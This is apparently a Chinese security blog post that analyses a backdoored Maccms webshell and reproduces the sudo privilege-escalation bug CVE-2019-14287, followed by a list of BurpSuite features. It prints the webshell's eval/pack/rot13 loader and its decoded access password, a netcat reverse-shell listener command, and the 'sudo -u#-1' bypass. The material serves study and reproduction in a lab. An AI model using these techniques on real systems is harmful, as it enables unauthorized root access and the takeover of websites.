10.16Maccms后门分析、Sudo提权漏洞(CVE-2019-14287)复现

Maccms后门分析

maccms网站基于php+mysql的系统,易用性、功能良好等优点,用途范围广

打开源码,extend\Qcloud\Sms\Sms.php、extend\upyun\src\Upyun\Api\Format.php是两个后门(Sms.php和Format.php是后门木马 二者代码相同)

<?php

error_reporting(E_ERROR);//报错

@ini_set(‘display_errors‘,‘Off‘);

@ini_set(‘max_execution_time‘,20000);

@ini_set(‘memory_limit‘,‘256M‘); //所有ini_set都是初始化环境

header("content-Type: text/html; charset=utf-8");

$password = "0d41c75e2ab34a3740834cdd7e066d90";//MD5加密的密码,解密后为WorldFilledWithLove

functions(){

$str =”编码后的恶意代码”;

$str = str_rot13($str);

m($str);

}

function m($str){

global $password;

$jj = ‘‘;

eval($jj.pack(‘H*‘,$str).$jj);  //pack(‘H*‘,$str)对混淆的php进行解码,解码之后进行eval函数处理

}

s();

?>

使用密码访问http://127.0.0.1/extend/Qcloud/Sms/Sms.php(访问Sms.php或Format.php,地址根据自己情况来)

这样就能看到管理的文件信息

反弹shell(将目标机上的终端或者解析器或shell弹到攻击者指定的电脑中,需要攻击者提前监听端口:使用“nc -lvvp 端口号” l表示本地 vv表示详细信息 p表示端口)

这样就能反弹目标机的shell到指定的地址上

Sudo提权漏洞(CVE-2019-14287)复现

Sudo是linux系统命令,用来让普通账号以root身份去执行某些命令,如,安装软件、查看某些配置文件、关机、重启等操作

,如果普通账号需要使用sudo,需要修改配置文件/etc.sudoers,将sudo使用权赋予该账号。

Sudo提权漏洞是一个安全策略绕过问题去执行某些敏感的命令,CVE编号是CVE-2019-14287,影响的版本是小于1.8.28的版本

复现:

Step1:查看版本 sudo -V

Step2:修改配置文件:vim /etc/sudoers在root ALL=(ALL:ALL)ALL下面添加一行配置代码

test ALL=(ALL,!root)ALL

第一个all表示该用户可以在任意地方使用sudo

(ALL,!root)表示明了可以被除了root以外的用户执行

最后的All表示被允许执行

整体:test用户可以使用sudo,但是除了root以外的任意用户去执行命令

注意:需要创建test用户: useradd test  , passwd test

Step3:切换到test用户,su test ,然后sudo id(查看root的id),发现没有权限去执行(这是root的权限)

使用如下方法执行我们想执行的命令

sudo -u#数字 命令

数字范围:-1~4294967295,命令是系统命令

其中数字-1表示root身份

修复方法:更新sudo版本1.8.28之后

总结:该漏洞复现比较鸡肋,需要管理员修改配置文件

BurpSuite功能

proxy代理

target目标

spider爬虫

scanner漏洞扫描

intruder暴力破解

repeater重放/中继(修改数据包并发送出去,查看回来的数据效果)

sequencer 定序器(分析不可预知的应用程序会话令牌和重要数据项的随机性的工具)

decoder编解码

comparer 比较

extender扩展(python、java、php)

其他

Project项目

User用户

原文地址:https://www.cnblogs.com/x98339/p/11687379.html

时间: 2025-01-09 21:54:43

10.16Maccms后门分析、Sudo提权漏洞(CVE-2019-14287)复现的相关文章

sudo 提权漏洞(CVE-2019-14287)复现 (10.16 第二十二天)

sudo是Linux系统命令,让普通账号以root身份去执行某些命令,比,安装软件.查看某些配置文件.关机.重启等操作,如果普通账号需要使用sudo需要修改配置文件/etc/sudoers,将sudo使用权赋予该账号 sudo提权漏洞是一个安全策略绕过问题,去执行某些敏感的命令,CVE编号是CVE-2019-14287,影响的版本是:<1.8.28 漏洞复现过程 1.查看版本:sudo -V 2.修改配置文件:vim/etc/sudoers在root ALL=(ALL:ALL)ALL 下面添加一

2019-10-16,sudo提权漏洞(CVE-2019-14287)实现

sudo是linux系统命令,让普通账号以root身份执行某些命令,比如,安装软件,查看某些配置文件,关机,重启等,如果普通用户需要使用sudo需要修改配置文件,/etc/sudoers,将sudo使用权限赋予该用户 sudo提权漏洞,是一个安全策略绕过问题,去执行某些敏感的命令,cve编号是CVE-2019-14287,影响版本是 sudo版本<1.8.28 漏洞复现1,查看sudo版本,命令sudo -V 2,修改配置文件,vim /etc/sudoers, root ALL(ALL:ALL

[漏洞复现]CVE-2019-14287 sudo提权漏洞

漏洞描述 2019年10月14日,CVE官方发布了CVE-2019-14287的漏洞预警.通过特定payload,用户可提升至root权限. 利用前提 sudo -v < 1.8.28 知道当前用户的密码 当前用户存在于sudo权限列表 漏洞复现 [email protected]:~$ id uid=1000(mark) gid=1000(mark) 组=1000(mark),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),

Sudo提权漏洞复现

Sudo是linux的系统命令,让普通账号以root方式执行命令 正常来说如果普通用户需要用sudo,需要修改配置文件/etc/sudoers,将sudo使用权赋予该用户 而这个漏洞使得普通用户也可以绕过安全策略,执行敏感命令 漏洞影响的版本是<1.8.28 实验环境:kali 漏洞复现过程 1. 查看sudo版本 Sudo –V 2. 修改配置文件:vim/etc/sudoers 在root(ALL:ALL)ALL添加一行 Test ALL=(ALL,!root)ALL 第一个ALL表示用户可

linux CVE-2019-14287 Sudo提权漏洞

CVE-2019-14287 sudo介绍 sudo,也就是以超级管理员身份运行(superuser do)的意思.sudo 是 Linux 中最常使用的重要实用程序之一,它功能十分强大,几乎安装在每一款基于 UNIX 或 Linux 的操作系统上,也是这些操作系统的核心命令.作为一个系统命令,普通用户可通过它以特殊权限来运行程序或命令(通常以 root 用户身份运行命令),而无需切换使用环境. § sudo能够限制用户只在某台主机上运行某些命令. § sudo提供了丰富的日志,详细地记录了每个

Android提权漏洞CVE-2014-7920&amp;CVE-2014-7921分析

没羽@阿里移动安全,更多安全类技术干货,请访问阿里聚安全博客 这是Android mediaserver的提权漏洞,利用CVE-2014-7920和CVE-2014-7921实现提权,从0权限提到media权限,其中CVE-2014-7921影响Android 4.0.3及以后的版本,CVE-2014-7920影响Android 2.2及以后的版本.Google直到Android5.1才修复这2个漏洞.该漏洞[1]披露过程如下: 2016年1月24日漏洞作者发布了漏洞分析及exploit[2],

sudo提权实战讲解 对用户对组的权限配置分析

Linux是多用户多任务的操作系统, 共享该系统的用户往往不只一个.出于安全性考虑, 有必要通过useradd创建一些非root用户, 只让它们拥有不完全的权限; 如有必要,再来提升权限执行. sudo就是来解决这个需求的: 这些非root用户不需要知道root的密码,就可以提权到root,执行一些root才能执行的命令. 用公式讲解/etc/sudoers的内容sudo的权限控制可以在/etc/sudoers文件中查看到. 如果想要控制某个用户(或某个组用户)只能执行root权限中的一部分命令

Ubuntu无法sudo提权,报当前用户不在sudoers文件中错误

Ubuntu安装后默认root不能登陆系统,密码也是随机生成,其他用户使用root权限,可以使用sudo提权,前提是该用户在/etc/sudoers配置列表中. 但是有时用户名从/etc/sudoers被意外删除了,sudo不能用了,root又不知道root密码(之前没有改过或者忘记了),如果想修改/etc/sudoers也不可能了,进入了一个死循环. 但可以如下面的方法解决: 1.重启按shift键,进入Ubuntu高级模式,选择一个recovery mode进入,出现一个9个选项的菜单,如果

基于RedHat发行的Apache Tomcat本地提权漏洞

描述 Tomcat最近总想搞一些大新闻,一个月都没到,Tomcat又爆出漏洞.2016年10月11日,网上爆出Tomcat本地提权漏洞,漏洞编号为CVE-2016-5425.此次受到影响的主要是基于RedHat发行版Apache Tomcat,包括CentOS,RedHat,OracleLinux,Fedora等等.主要原因是普通Tomcat用户拥有权限来对/usr/lib/tmpfiles.d/tomcat.conf这个配置文件进行读写,那么该用户组成员或者拥有普通Tomcat权限的WebSh